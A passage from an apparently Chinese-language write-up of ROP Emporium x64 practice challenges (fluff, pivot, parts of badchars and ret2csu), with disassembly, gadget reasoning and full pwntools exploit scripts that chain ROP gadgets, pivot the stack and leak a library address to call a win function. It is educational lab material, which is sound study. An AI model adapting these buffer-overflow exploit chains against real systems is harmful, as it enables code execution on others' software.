.text:0000000000400638 sub_400634      endp

目标是读取flag.txt,这里的意思应该是,通过输入其他的数值,然后通过计算来绕过过滤,出现过滤字符会变成EB

有提供print_file的链接,可以调用这个函数,目标就是rop到目标函数!

int __fastcall print_file(const char *a1)
{
  char s[40]; // [rsp+10h] [rbp-30h] BYREF
  FILE *stream; // [rsp+38h] [rbp-8h]

  stream = fopen(a1, "r");
  if ( !stream )
  {
    printf("Failed to open file: %s\n", a1);
    exit(1);
  }
  fgets(s, 33, stream);
  puts(s);
  return fclose(stream);
}

这里参数提供文件名,需要我们自己构造参数

思路是,无脑给flag.txt字符串进行异或,绕过限制,然后调整r14和r15指针,去逐个异或解密,然后跳转到print_file

要是觉得太长了,可以优化一下,部分位不进行加密,只解密过滤的位,这里图省事全处理了

exp:

#!/bin/python3
from Crypto.Util.number import *
from pwn import *
warnings.filterwarnings(action='ignore',category=BytesWarning)
context.log_level = 'debug'
FILE_NAME = "badchars"
REMOTE_HOST = ""
REMOTE_PORT = 0

elf = context.binary = ELF(FILE_NAME)
libc = elf.libc

gs = '''
continue
'''
def start():
    if args.REMOTE:
        return remote(REMOTE_HOST,REMOTE_PORT)
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# =======================================

io = start()

# =============================================================================
# ============== exploit ===================

"""
.text:0000000000400628 usefulGadgets:
.text:0000000000400628                 xor     [r15], r14b
.text:000000000040062B                 retn
.text:000000000040062C ; ---------------------------------------------------------------------------
.text:000000000040062C                 add     [r15], r14b
.text:000000000040062F                 retn
.text:0000000000400630 ; ---------------------------------------------------------------------------
.text:0000000000400630                 sub     [r15], r14b
.text:0000000000400633                 retn
.text:0000000000400634
.text:0000000000400634 ; =============== S U B R O U T I N E =======================================
.text:0000000000400634
.text:0000000000400634
.text:0000000000400634 sub_400634      proc near
.text:0000000000400634                 mov     [r13+0], r12
.text:0000000000400638                 retn
.text:0000000000400638 sub_400634      endp
"""

# filter the x g a .
buf = 0x601100
i = 0
rop = ROP(elf,badchars=b'xga.')
rop.rbp = buf-0x100
rop.raw(0x40069c)
rop.raw(bytes_to_long("".join(reversed("flag.txt")).encode()) ^ 0x1111111111111111)
rop.raw(buf)
rop.raw(0x11)
rop.raw(buf+i)
rop.raw(0x000000000400634)
# 0x0000000000400628 : xor byte ptr [r15], r14b ; ret
rop.raw(0x000000000400628)
i+=1
while i<8:
    rop.raw(0x00000000004006a2)    # 0x00000000004006a2 : pop r15 ; ret
    rop.raw(buf+i)
    rop.raw(0x000000000400628)    # 0x0000000000400628 : xor byte ptr [r15], r14b ; ret
    i+=1

rop.rdi = buf
rop.raw(elf.plt.print_file)

print(rop.dump())
payload = cyclic(0x28) + rop.chain()
io.sendlineafter(b"> ",payload)

io.interactive()

运行结果:

[DEBUG] Received 0x2c bytes:
    b'Thank you!\n'
    b'ROPE{a_placeholder_32byte_flag!}\n'
Thank you!
ROPE{a_placeholder_32byte_flag!}

6. fluff

缓解机制:【NX】

程序:(位于so文件)

.text:00000000000008AA pwnme           proc near               ; DATA XREF: LOAD:00000000000003E0↑o
.text:00000000000008AA
.text:00000000000008AA s               = byte ptr -20h
.text:00000000000008AA
.text:00000000000008AA ; __unwind {
.text:00000000000008AA                 push    rbp
.text:00000000000008AB                 mov     rbp, rsp
.text:00000000000008AE                 sub     rsp, 20h
.text:00000000000008B2                 mov     rax, cs:stdout_ptr
.text:00000000000008B9                 mov     rax, [rax]
.text:00000000000008BC                 mov     ecx, 0          ; n
.text:00000000000008C1                 mov     edx, 2          ; modes
.text:00000000000008C6                 mov     esi, 0          ; buf
.text:00000000000008CB                 mov     rdi, rax        ; stream
.text:00000000000008CE                 call    _setvbuf
.text:00000000000008D3                 lea     rdi, s          ; "fluff by ROP Emporium"
.text:00000000000008DA                 call    _puts
.text:00000000000008DF                 lea     rdi, aX8664     ; "x86_64\n"
.text:00000000000008E6                 call    _puts
.text:00000000000008EB                 lea     rax, [rbp+s]
.text:00000000000008EF                 mov     edx, 20h ; ' '  ; n
.text:00000000000008F4                 mov     esi, 0          ; c
.text:00000000000008F9                 mov     rdi, rax        ; s
.text:00000000000008FC                 call    _memset
.text:0000000000000901                 lea     rdi, aYouKnowChangin ; "You know changing these strings means I"...
.text:0000000000000908                 call    _puts
.text:000000000000090D                 lea     rdi, format     ; "> "
.text:0000000000000914                 mov     eax, 0
.text:0000000000000919                 call    _printf

.text:000000000000091E                 lea     rax, [rbp+s]
.text:0000000000000922                 mov     edx, 200h       ; nbytes
.text:0000000000000927                 mov     rsi, rax        ; buf
.text:000000000000092A                 mov     edi, 0          ; fd
.text:000000000000092F                 call    _read

.text:0000000000000934                 lea     rdi, aThankYou  ; "Thank you!"
.text:000000000000093B                 call    _puts
.text:0000000000000940                 nop
.text:0000000000000941                 leave
.text:0000000000000942                 retn
.text:0000000000000942 ; } // starts at 8AA
.text:0000000000000942 pwnme           endp

read调用存在溢出

程序提供了一些辅助代码:

.text:0000000000400617 usefulFunction  proc near
.text:0000000000400617 ; __unwind {
.text:0000000000400617                 push    rbp
.text:0000000000400618                 mov     rbp, rsp
.text:000000000040061B                 mov     edi, offset aNonexistent ; "nonexistent"
.text:0000000000400620                 call    _print_file
.text:0000000000400625                 nop
.text:0000000000400626                 pop     rbp
.text:0000000000400627                 retn
.text:0000000000400627 ; } // starts at 400617
.text:0000000000400627 usefulFunction  endp
.text:0000000000400627
.text:0000000000400628 ; ---------------------------------------------------------------------------
.text:0000000000400628
.text:0000000000400628 questionableGadgets:
.text:0000000000400628                 xlat
.text:0000000000400629                 retn
.text:000000000040062A ; ---------------------------------------------------------------------------
.text:000000000040062A                 pop     rdx
.text:000000000040062B                 pop     rcx
.text:000000000040062C                 add     rcx, 3EF2h
.text:0000000000400633                 bextr   rbx, rcx, rdx
.text:0000000000400638                 retn
.text:0000000000400639 ; ---------------------------------------------------------------------------
.text:0000000000400639                 stosb
.text:000000000040063A                 retn
.text:000000000040063A ; ---------------------------------------------------------------------------

目标是读取flag.txt,这里也提供了print_file函数可以用,需要参数flag.txt字符串指针

xlat:以al为偏移,索引bx指向内存中的字节,可以用来从内存里取字节,需要al和bx的值可控

bextr:位域索引,第一个源操作数是原数据,第二个源操作数是索引开始位置(8位)和长度,这里可以控制rbx的值

其他有用的gadget:

0x00000000004006a3 : pop rdi ; ret
0x0000000000400639 : stosb byte ptr [rdi], al ; ret

stosb可以保存1个字节从al到rdi指向的地址,rdi可以控制,设置为随便一个可写地址就行

xlat的效果是,al = [al+rbx],rbx是数组,从rbx中用al索引一个字节到al上,al这里初始值是0xb,需要rbx可控,就能控制al的值

bextr可以用来控制rbx的值,rcx填写目标地址-0x3e2f的值,rdx填写0x4000,表示把rcx的值全部复制给rbx

到此,rbx可控,从而al可控,从而可以写入字节到任意可写内存,开始一步一步实现:

控制rbx:

def set_rbx(b:int):
    p = b""
    p += pack(bextr_ret)
    p += pack(0x4000)
    p += pack(b - 0x3ef2)
    return p

控制al:

def set_al(a:bytes,offset:int):
    tmp = next(elf.search(a)) - offset
    #print(hex(tmp))
    p = pack(xlatb_ret)
    return set_rbx(tmp) + p

保存al到地址:

is_first = True
def save_al(val:bytes,offset:int):
    global is_first
    p = b""
    if is_first:
        p += pack(pop_rdi_ret)
        p += pack(buffer)
        is_first = False
    p += pack(stosb_rdi_al_ret)
    return set_al(val,offset) + p

保存字符串到地址:

def write_str(s:bytes):
    p=b""
    last_al = 0xb
    for i in s:
        p += save_al(p8(i),last_al)
        last_al = i
    return p

完整exp:

#!/bin/python3
from Crypto.Util.number import *
from pwn import *
warnings.filterwarnings(action='ignore',category=BytesWarning)
context.log_level = 'debug'
FILE_NAME = "fluff"
REMOTE_HOST = ""
REMOTE_PORT = 0

elf = context.binary = ELF(FILE_NAME)
libc = elf.libc

gs = '''
b*pwnme+151
'''
def start():
    if args.REMOTE:
        return remote(REMOTE_HOST,REMOTE_PORT)
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# =======================================

io = start()

# =============================================================================
# ============== exploit ===================
pop_rdi_ret = 0x00000000004006a3        # : pop rdi ; ret
stosb_rdi_al_ret = 0x0000000000400639   # : stosb byte ptr [rdi], al ; ret
xlatb_ret = 0x0000000000400628          # : xlat ; ret

"""
.text:000000000040062A                 pop     rdx
.text:000000000040062B                 pop     rcx
.text:000000000040062C                 add     rcx, 3EF2h
.text:0000000000400633                 bextr   rbx, rcx, rdx
.text:0000000000400638                 retn
"""
bextr_ret = 0x000000000040062A

padding = b'A' * 0x28

buffer = 0x000000000601038
print_file = 0x000000000400620

def set_rbx(b:int):
    p = b""
    p += pack(bextr_ret)
    p += pack(0x4000)
    p += pack(b - 0x3ef2)
    return p

def set_al(a:bytes,offset:int):
    tmp = next(elf.search(a)) - offset
    #print(hex(tmp))
    p = pack(xlatb_ret)
    return set_rbx(tmp) + p

is_first = True
def save_al(val:bytes,offset:int):
    global is_first
    p = b""
    if is_first:
        p += pack(pop_rdi_ret)
        p += pack(buffer)
        is_first = False
    p += pack(stosb_rdi_al_ret)
    return set_al(val,offset) + p

def write_str(s:bytes):
    p=b""
    last_al = 0xb
    for i in s:
        p += save_al(p8(i),last_al)
        last_al = i
    return p

payload = write_str(b"flag.txt")
payload += pack(pop_rdi_ret)
payload += pack(buffer)
payload += pack(print_file)

io.sendline(padding + payload)

io.interactive()

运行结果:

fluff.zip.d ➤ python3 exp.py '/home/selph/ctf/CTF_selph/rop_emporium_all_challenges/x64/fluff.zip.d/fluff'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'.' '/usr/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process '/home/selph/ctf/CTF_selph/rop_emporium_all_challenges/x64/fluff.zip.d/fluff' argv=[b'/home/selph/ctf/CTF_selph/rop_emporium_all_challenges/x64/fluff.zip.d/fluff'] : pid 66892
[DEBUG] Sent 0x191 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000020  41 41 41 41  41 41 41 41  2a 06 40 00  00 00 00 00  │AAAA│AAAA│*·@·│····│
    00000030  00 40 00 00  00 00 00 00  c7 c4 3f 00  00 00 00 00  │·@··│····│··?·│····│
    00000040  28 06 40 00  00 00 00 00  a3 06 40 00  00 00 00 00  │(·@·│····│··@·│····│
    00000050  38 10 60 00  00 00 00 00  39 06 40 00  00 00 00 00  │8·`·│····│9·@·│····│
    00000060  2a 06 40 00  00 00 00 00  00 40 00 00  00 00 00 00  │*·@·│····│·@··│····│
    00000070  e1 c2 3f 00  00 00 00 00  28 06 40 00  00 00 00 00  │··?·│····│(·@·│····│
    00000080  39 06 40 00  00 00 00 00  2a 06 40 00  00 00 00 00  │9·@·│····│*·@·│····│
    00000090  00 40 00 00  00 00 00 00  78 c4 3f 00  00 00 00 00  │·@··│····│x·?·│····│
    000000a0  28 06 40 00  00 00 00 00  39 06 40 00  00 00 00 00  │(·@·│····│9·@·│····│
    000000b0  2a 06 40 00  00 00 00 00  00 40 00 00  00 00 00 00  │*·@·│····│·@··│····│
    000000c0  7c c4 3f 00  00 00 00 00  28 06 40 00  00 00 00 00  │|·?·│····│(·@·│····│
    000000d0  39 06 40 00  00 00 00 00  2a 06 40 00  00 00 00 00  │9·@·│····│*·@·│····│
    000000e0  00 40 00 00  00 00 00 00  f5 c2 3f 00  00 00 00 00  │·@··│····│··?·│····│
    000000f0  28 06 40 00  00 00 00 00  39 06 40 00  00 00 00 00  │(·@·│····│9·@·│····│
    00000100  2a 06 40 00  00 00 00 00  00 40 00 00  00 00 00 00  │*·@·│····│·@··│····│
    00000110  72 c2 3f 00  00 00 00 00  28 06 40 00  00 00 00 00  │r·?·│····│(·@·│····│
    00000120  39 06 40 00  00 00 00 00  2a 06 40 00  00 00 00 00  │9·@·│····│*·@·│····│
    00000130  00 40 00 00  00 00 00 00  e0 c2 3f 00  00 00 00 00  │·@··│····│··?·│····│
    00000140  28 06 40 00  00 00 00 00  39 06 40 00  00 00 00 00  │(·@·│····│9·@·│····│
    00000150  2a 06 40 00  00 00 00 00  00 40 00 00  00 00 00 00  │*·@·│····│·@··│····│
    00000160  28 c2 3f 00  00 00 00 00  28 06 40 00  00 00 00 00  │(·?·│····│(·@·│····│
    00000170  39 06 40 00  00 00 00 00  a3 06 40 00  00 00 00 00  │9·@·│····│··@·│····│
    00000180  38 10 60 00  00 00 00 00  20 06 40 00  00 00 00 00  │8·`·│····│ ·@·│····│
    00000190  0a                                                  │·│
    00000191 Switching to interactive mode
[DEBUG] Received 0x94 bytes:
    b'fluff by ROP Emporium\n'
    b'x86_64\n'
    b'\n'
    b'You know changing these strings means I have to rewrite my solutions...\n'
    b'> Thank you!\n'
    b'ROPE{a_placeholder_32byte_flag!}\n'
fluff by ROP Emporium
x86_64

You know changing these strings means I have to rewrite my solutions...
> Thank you!
ROPE{a_placeholder_32byte_flag!}

7. pivot

缓解机制:【NX】

程序:

main:

.text:0000000000400847 ; int __fastcall main(int argc, const char **argv, const char **envp)
.text:0000000000400847                 public main
.text:0000000000400847 main            proc near               ; DATA XREF: _start+1D↑o
.text:0000000000400847
.text:0000000000400847 var_10          = qword ptr -10h
.text:0000000000400847 ptr             = qword ptr -8
.text:0000000000400847
.text:0000000000400847 ; __unwind {
.text:0000000000400847                 push    rbp
.text:0000000000400848                 mov     rbp, rsp
.text:000000000040084B                 sub     rsp, 10h
.text:000000000040084F                 mov     rax, cs:__bss_start
.text:0000000000400856                 mov     ecx, 0          ; n
.text:000000000040085B                 mov     edx, 2          ; modes
.text:0000000000400860                 mov     esi, 0          ; buf
.text:0000000000400865                 mov     rdi, rax        ; stream
.text:0000000000400868                 call    _setvbuf
.text:000000000040086D                 mov     edi, offset s   ; "pivot by ROP Emporium"
.text:0000000000400872                 call    _puts
.text:0000000000400877                 mov     edi, offset aX8664 ; "x86_64\n"
.text:000000000040087C                 call    _puts
.text:0000000000400881                 mov     [rbp+ptr], 0
.text:0000000000400889                 mov     edi, 1000000h   ; size
.text:000000000040088E                 call    _malloc
.text:0000000000400893                 mov     [rbp+ptr], rax
.text:0000000000400897                 cmp     [rbp+ptr], 0
.text:000000000040089C                 jnz     short loc_4008B2
.text:000000000040089E                 mov     edi, offset aFailedToReques ; "Failed to request space for pivot stack"
.text:00000000004008A3                 call    _puts
.text:00000000004008A8                 mov     edi, 1          ; status
.text:00000000004008AD                 call    _exit
.text:00000000004008B2 ; ---------------------------------------------------------------------------
.text:00000000004008B2
.text:00000000004008B2 loc_4008B2:                             ; CODE XREF: main+55↑j
.text:00000000004008B2                 mov     rax, [rbp+ptr]
.text:00000000004008B6                 add     rax, 0FFFF00h
.text:00000000004008BC                 mov     [rbp+var_10], rax
.text:00000000004008C0                 mov     rax, [rbp+var_10]
.text:00000000004008C4                 mov     rdi, rax
.text:00000000004008C7                 call    pwnme
.text:00000000004008CC                 mov     [rbp+var_10], 0
.text:00000000004008D4                 mov     rax, [rbp+ptr]
.text:00000000004008D8                 mov     rdi, rax        ; ptr
.text:00000000004008DB                 call    _free
.text:00000000004008E0                 mov     edi, offset aExiting ; "\nExiting"
.text:00000000004008E5                 call    _puts
.text:00000000004008EA                 mov     eax, 0
.text:00000000004008EF                 leave
.text:00000000004008F0                 retn
.text:00000000004008F0 ; } // starts at 400847
.text:00000000004008F0 main            endp

这里申请了巨大无比的内存传入

pwnme:

.text:00000000004008F1 pwnme           proc near               ; CODE XREF: main+80↑p
.text:00000000004008F1
.text:00000000004008F1 buf             = qword ptr -28h
.text:00000000004008F1 s               = byte ptr -20h
.text:00000000004008F1
.text:00000000004008F1 ; __unwind {
.text:00000000004008F1                 push    rbp
.text:00000000004008F2                 mov     rbp, rsp
.text:00000000004008F5                 sub     rsp, 30h
.text:00000000004008F9                 mov     [rbp+buf], rdi
.text:00000000004008FD                 lea     rax, [rbp+s]
.text:0000000000400901                 mov     edx, 20h ; ' '  ; n
.text:0000000000400906                 mov     esi, 0          ; c
.text:000000000040090B                 mov     rdi, rax        ; s
.text:000000000040090E                 call    _memset
.text:0000000000400913                 mov     edi, offset aCallRet2winFro ; "Call ret2win() from libpivot"
.text:0000000000400918                 call    _puts
.text:000000000040091D                 mov     rax, [rbp+buf]
.text:0000000000400921                 mov     rsi, rax
.text:0000000000400924                 mov     edi, offset format ; "The Old Gods kindly bestow upon you a p"...
.text:0000000000400929                 mov     eax, 0
.text:000000000040092E                 call    _printf
.text:0000000000400933                 mov     edi, offset aSendARopChainN ; "Send a ROP chain now and it will land t"...
.text:0000000000400938                 call    _puts
.text:000000000040093D                 mov     edi, offset asc_400B34 ; "> "
.text:0000000000400942                 mov     eax, 0
.text:0000000000400947                 call    _printf
.text:000000000040094C                 mov     rax, [rbp+buf]
.text:0000000000400950                 mov     edx, 100h       ; nbytes
.text:0000000000400955                 mov     rsi, rax        ; buf
.text:0000000000400958                 mov     edi, 0          ; fd
.text:000000000040095D                 call    _read

.text:0000000000400962                 mov     edi, offset aThankYou ; "Thank you!\n"
.text:0000000000400967                 call    _puts
.text:000000000040096C                 mov     edi, offset aNowPleaseSendY ; "Now please send your stack smash"
.text:0000000000400971                 call    _puts
.text:0000000000400976                 mov     edi, offset asc_400B34 ; "> "
.text:000000000040097B                 mov     eax, 0
.text:0000000000400980                 call    _printf
.text:0000000000400985                 lea     rax, [rbp+s]
.text:0000000000400989                 mov     edx, 40h ; '@'  ; nbytes
.text:000000000040098E                 mov     rsi, rax        ; buf
.text:0000000000400991                 mov     edi, 0          ; fd
.text:0000000000400996                 call    _read

.text:000000000040099B                 mov     edi, offset aThankYou_0 ; "Thank you!"
.text:00000000004009A0                 call    _puts
.text:00000000004009A5                 nop
.text:00000000004009A6                 leave
.text:00000000004009A7                 retn
.text:00000000004009A7 ; } // starts at 4008F1
.text:00000000004009A7 pwnme           endp

read调用了2次,第一次是读取到一个缓冲区里,第二次是读取到栈上,可溢出长度非常短

程序提供了缓冲区的地址,这是个栈迁移pivot的示例练习,程序执行输出信息:

pivot.zip.d ➤ ./pivot
pivot by ROP Emporium
x86_64

Call ret2win() from libpivot
The Old Gods kindly bestow upon you a place to pivot: 0x7f2319fd5f10
Send a ROP chain now and it will land there
> 111
Thank you!

Now please send your stack smash
> 222
Thank you!

Exiting

程序提供了一些辅助代码:

.text:00000000004009A8 uselessFunction proc near
.text:00000000004009A8 ; __unwind {
.text:00000000004009A8                 push    rbp
.text:00000000004009A9                 mov     rbp, rsp
.text:00000000004009AC                 call    _foothold_function
.text:00000000004009B1                 mov     edi, 1          ; status
.text:00000000004009B6                 call    _exit
.text:00000000004009B6 ; } // starts at 4009A8
.text:00000000004009B6 uselessFunction endp
.text:00000000004009B6
.text:00000000004009BB ; ---------------------------------------------------------------------------
.text:00000000004009BB
.text:00000000004009BB usefulGadgets:
.text:00000000004009BB                 pop     rax
.text:00000000004009BC                 retn
.text:00000000004009BD ; ---------------------------------------------------------------------------
.text:00000000004009BD                 xchg    rax, rsp
.text:00000000004009BF                 retn
.text:00000000004009C0
.text:00000000004009C0 ; =============== S U B R O U T I N E =======================================
.text:00000000004009C0
.text:00000000004009C0
.text:00000000004009C0 sub_4009C0      proc near
.text:00000000004009C0                 mov     rax, [rax]
.text:00000000004009C3                 retn
.text:00000000004009C3 sub_4009C0      endp
.text:00000000004009C3
.text:00000000004009C4 ; ---------------------------------------------------------------------------
.text:00000000004009C4                 add     rax, rbp
.text:00000000004009C7                 retn

提供了_foothold_function函数,在so库里,查看so该函数:

.text:000000000000096A foothold_function proc near             ; DATA XREF: LOAD:0000000000000388↑o
.text:000000000000096A ; __unwind {
.text:000000000000096A                 push    rbp
.text:000000000000096B                 mov     rbp, rsp
.text:000000000000096E                 lea     rdi, s          ; "foothold_function(): Check out my .got."...
.text:0000000000000975                 call    _puts
.text:000000000000097A                 nop
.text:000000000000097B                 pop     rbp
.text:000000000000097C                 retn
.text:000000000000097C ; } // starts at 96A
.text:000000000000097C foothold_function endp

该函数毫无意义,但是可以用于延迟绑定后提供该so库的地址泄露

so库里还有个后门函数:

.text:0000000000000A81                 public ret2win
.text:0000000000000A81 ret2win         proc near               ; DATA XREF: LOAD:0000000000000448↑o
.text:0000000000000A81
.text:0000000000000A81 stream          = qword ptr -38h
.text:0000000000000A81 s               = byte ptr -30h
.text:0000000000000A81 var_8           = qword ptr -8
.text:0000000000000A81
.text:0000000000000A81 ; __unwind {
.text:0000000000000A81                 push    rbp
.text:0000000000000A82                 mov     rbp, rsp
.text:0000000000000A85                 sub     rsp, 40h
.text:0000000000000A89                 mov     rax, fs:28h
.text:0000000000000A92                 mov     [rbp+var_8], rax
.text:0000000000000A96                 xor     eax, eax
.text:0000000000000A98                 mov     [rbp+stream], 0
.text:0000000000000AA0                 lea     rsi, modes      ; "r"
.text:0000000000000AA7                 lea     rdi, filename   ; "flag.txt"
.text:0000000000000AAE                 call    _fopen
.text:0000000000000AB3                 mov     [rbp+stream], rax
.text:0000000000000AB7                 cmp     [rbp+stream], 0
.text:0000000000000ABC                 jnz     short loc_AD4
.text:0000000000000ABE                 lea     rdi, aFailedToOpenFi ; "Failed to open file: flag.txt"
.text:0000000000000AC5                 call    _puts
.text:0000000000000ACA                 mov     edi, 1          ; status
.text:0000000000000ACF                 call    _exit
.text:0000000000000AD4 ; ---------------------------------------------------------------------------
.text:0000000000000AD4
.text:0000000000000AD4 loc_AD4:                                ; CODE XREF: ret2win+3B↑j
.text:0000000000000AD4                 mov     rdx, [rbp+stream] ; stream
.text:0000000000000AD8                 lea     rax, [rbp+s]
.text:0000000000000ADC                 mov     esi, 21h ; '!'  ; n
.text:0000000000000AE1                 mov     rdi, rax        ; s
.text:0000000000000AE4                 call    _fgets
.text:0000000000000AE9                 lea     rax, [rbp+s]
.text:0000000000000AED                 mov     rdi, rax        ; s
.text:0000000000000AF0                 call    _puts
.text:0000000000000AF5                 mov     rax, [rbp+stream]
.text:0000000000000AF9                 mov     rdi, rax        ; stream
.text:0000000000000AFC                 call    _fclose
.text:0000000000000B01                 mov     [rbp+stream], 0
.text:0000000000000B09                 mov     edi, 0          ; status
.text:0000000000000B0E                 call    _exit
.text:0000000000000B0E ; } // starts at A81
.text:0000000000000B0E ret2win         endp
.text:0000000000000B0E
.text:0000000000000B0E _text           ends

思路现在就是:

  1. 执行_foothold_function函数,
  2. 打印_foothold_function的got表,泄露地址,拿到win函数地址
  3. 返回到pwnme函数的末尾read函数调用

    1. 这里要注意rbp的值,以及leave之后的rsp,适当的调整以至于能覆盖到返回地址
  4. 调用win函数

在此之前,需要进行栈迁移:

  1. 读取提供的可控缓冲区地址
  2. 使用该地址覆盖rbp
  3. 返回地址跳转到leave ret指令,完成迁移

exp:

#!/bin/python3
from Crypto.Util.number import *
from pwn import *
warnings.filterwarnings(action='ignore',category=BytesWarning)
context.log_level = 'debug'
FILE_NAME = "./pivot"
REMOTE_HOST = ""
REMOTE_PORT = 0

elf = context.binary = ELF(FILE_NAME)
libc = elf.libc

gs = '''
'''
def start():
    if args.REMOTE:
        return remote(REMOTE_HOST,REMOTE_PORT)
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# =======================================

io = start()

# =============================================================================
# ============== exploit ===================

io.recvuntil(b"The Old Gods kindly bestow upon you a place to pivot: ")
buffer = io.recvline()[:-1]
buffer = int(buffer.decode(),16)
buffer = buffer 
print(hex(buffer))

_foothold_function_plt = 0x00000000400720
_foothold_function_got = 0x00000000601040
main = 0x000000000400985
rop = ROP(elf)
rop.raw(_foothold_function_plt)
rop.puts(_foothold_function_got)
rop.rbp=buffer + 0x60
rop.raw(main)
io.sendafter(b"> ",b"A" *   0x8 + rop.chain())

padding = b"A" * 0x20
payload2 = padding + pack(buffer) + pack(next(elf.search(asm("leave;ret"))))
print(payload2)
io.sendafter(b"> ",payload2)

io.recvuntil(b"foothold_function(): Check out my .got.plt entry to gain a foothold into libpivot\n")
leak = io.recvline()[:-1]
leak = u64(leak.ljust(8, b"\x00"))
print(hex(leak))

baseso = leak - 0x96a
win = baseso + 0xa81
payload3 = b"A"*0x28+ pack(win)
io.send(payload3)

io.interactive()

运行结果:

pivot.zip.d ➤ ./exp_cli.py debug pivot '/home/selph/ctf/CTF_selph/rop_emporium_all_challenges/x64/pivot.zip.d/pivot'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'.'
[+] Starting local process '/home/selph/ctf/CTF_selph/rop_emporium_all_challenges/x64/pivot.zip.d/pivot': pid 123437
0x7fc5097d5f10
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x10_}\t\xc5\x7f\x00\x00\xef\x08@\x00\x00\x00\x00\x00'
0x7fc509a0096a
Thank you!
ROPE{a_placeholder_32byte_flag!}

8. ret2csu

缓解机制:【NX】

程序:pwnme在so库里

.text:000000000000093A                 public pwnme
.text:000000000000093A pwnme           proc near               ; DATA XREF: LOAD:00000000000003F8↑o
.text:000000000000093A
.text:000000000000093A s               = byte ptr -20h
.text:000000000000093A
.text:000000000000093A ; __unwind {
.text:000000000000093A                 push    rbp
.text:000000000000093B                 mov     rbp, rsp
.text:000000000000093E                 sub     rsp, 20h
.text:0000000000000942                 mov     rax, cs:stdout_ptr
.text:0000000000000949                 mov     rax, [rax]
.text:000000000000094C                 mov     ecx, 0          ; n
.text:0000000000000951                 mov     edx, 2          ; modes
.text:0000000000000956                 mov     esi, 0          ; buf
.text:000000000000095B                 mov     rdi, rax        ; stream
.text:000000000000095E                 call    _setvbuf
.text:0000000000000963                 lea     rdi, s          ; "ret2csu by ROP Emporium"
.text:000000000000096A                 call    _puts
.text:000000000000096F                 lea     rdi, aX8664     ; "x86_64\n"
.text:0000000000000976                 call    _puts
.text:000000000000097B                 lea     rax, [rbp+s]
.text:000000000000097F                 mov     edx, 20h ; ' '  ; n
.text:0000000000000984                 mov     esi, 0          ; c
.text:0000000000000989                 mov     rdi, rax        ; s
.text:000000000000098C                 call    _memset
.text:0000000000000991                 lea     rdi, aCheckOutHttpsR ; "Check out https://ropemporium.com/chall"...
.text:0000000000000998                 call    _puts
.text:000000000000099D                 lea     rdi, format     ; "> "
.text:00000000000009A4                 mov     eax, 0
.text:00000000000009A9                 call    _printf
.text:00000000000009AE                 lea     rax, [rbp+s]
.text:00000000000009B2                 mov     edx, 200h       ; nbytes
.text:00000000000009B7                 mov     rsi, rax        ; buf
.text:00000000000009BA                 mov     edi, 0          ; fd
.text:00000000000009BF                 call    _read
.text:00000000000009C4                 lea     rdi, aThankYou  ; "Thank you!"
.text:00000000000009CB                 call    _puts
.text:00000000000009D0                 nop
.text:00000000000009D1                 leave
.text:00000000000009D2                 retn
.text:00000000000009D2 ; } // starts at 93A
.text:00000000000009D2 pwnme           endp

read调用存在溢出,可以溢出很大空间

so库还提供了后门函数:(太长了,就用伪代码吧)

void __fastcall __noreturn ret2win(__int64 a1, __int64 a2, __int64 a3)
{
  FILE *stream; // [rsp+20h] [rbp-10h]
  FILE *streama; // [rsp+20h] [rbp-10h]
  int i; // [rsp+2Ch] [rbp-4h]

  if ( a1 == 0xDEADBEEFDEADBEEFLL && a2 == 0xCAFEBABECAFEBABELL && a3 == 0xD00DF00DD00DF00DLL )
  {
    stream = fopen("encrypted_flag.dat", "r");
    if ( !stream )
    {
      puts("Failed to open encrypted_flag.dat");
      exit(1);
    }
    g_buf = (char *)malloc(0x21uLL);
    if ( !g_buf )
    {
      puts("Could not allocate memory");
      exit(1);
    }
    g_buf = fgets(g_buf, 33, stream);
    fclose(stream);
    streama = fopen("key.dat", "r");
    if ( !streama )
    {
      puts("Failed to open key.dat");
      exit(1);
    }
    for ( i = 0; i <= 31; ++i )
      g_buf[i] ^= fgetc(streama);
    *(_QWORD *)(g_buf + 4) ^= 0xDEADBEEFDEADBEEFLL;
    *(_QWORD *)(g_buf + 12) ^= 0xCAFEBABECAFEBABELL;
    *(_QWORD *)(g_buf + 20) ^= 0xD00DF00DD00DF00DLL;
    puts(g_buf);
    exit(0);
  }
  puts("Incorrect parameters");
  exit(1);
}

elf里的有用片段:

.text:0000000000400617 usefulFunction  proc near
.text:0000000000400617 ; __unwind {
.text:0000000000400617                 push    rbp
.text:0000000000400618                 mov     rbp, rsp
.text:000000000040061B                 mov     edx, 3
.text:0000000000400620                 mov     esi, 2
.text:0000000000400625                 mov     edi, 1
.text:000000000040062A                 call    _ret2win
.text:000000000040062F                 nop
.text:0000000000400630                 pop     rbp
.text:0000000000400631                 retn
.text:0000000000400631 ; } // starts at 400617
.text:0000000000400631 usefulFunction  endp

调用后门函数,但是参数是错误的

题目的意图很明确,需要满足参数条件后,直接调用win函数

  • rdi = 0xDEADBEEFDEADBEEF
  • rsi = 0xCAFEBABECAFEBABE
  • rdx= 0xD00DF00DD00DF00D

gadgets不满足目标:没法修改这三个值

ret2csu.zip.d ➤ ROPgadget --binary ret2csu --only "pop|ret"
Gadgets information
============================================================
0x000000000040069c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040069e : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006a0 : pop r14 ; pop r15 ; ret
0x00000000004006a2 : pop r15 ; ret
0x000000000040069b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040069f : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400588 : pop rbp ; ret
0x00000000004006a3 : pop rdi ; ret
